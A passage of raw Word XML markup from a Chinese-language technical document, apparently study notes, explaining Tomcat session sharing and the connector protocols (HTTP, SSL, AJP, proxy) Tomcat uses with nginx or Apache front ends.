        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tomcat session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>共享</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006002FC" w:rsidRPr="00F41A4C" w:rsidRDefault="006002FC" w:rsidP="006002FC">
      <w:pPr>
        <w:ind w:left="780"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Server.xml </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: http://www.tuicool.com/articles/qINNZf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A5B05" w:rsidRPr="00F41A4C" w:rsidRDefault="004A5B05" w:rsidP="004A5B05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.3</w:t>
      </w:r>
      <w:r w:rsidR="006F5465">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00695D1D" w:rsidP="00EE184C">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.8.3.1</w:t>
      </w:r>
      <w:r w:rsidR="00D124DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE184C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00EE184C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>omcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与前端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的通信时靠</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>连接器协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来完成，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种连接器协议，分别为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>连接器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>AJP1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>连接器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00102FF1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>roxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>AJP(Apache JServ Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前正在使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的版本是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JK2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器提供支持的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它基于二进制的格式在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间传输数据，而此前的版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则使用文本格式传输数据。由于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>这种协议是二进制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>此在处理请求时的效率比</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>协议要高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。目前常用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的版本是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它主要有以下特征：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在快速网络有着较好的性能表现，支持数据压缩传输；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，加密及客户端证书；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例集群；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的连接的重用，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不适用于与</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="0087687D" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>协议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>诚如其名称所表示，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间建立通信，此时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是一个完全功能的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，它需要监听在某端口上以接收来自于前端服务器的请求，对于动态请求需要转交给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器进行处理。如果前端是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做代理的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>之间的通信只能使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了，而不能使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AJP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器也有</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器有三种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE184C" w:rsidRPr="005E35AB" w:rsidRDefault="00EE184C" w:rsidP="00EE184C">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器，这也是</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat6</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认使用的连接器，即</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Coyote</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；它是</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>standalone</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式工作时所用到的连接器，可直接响应来自用户浏览器的关于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="005E35AB">
        <w:rPr>
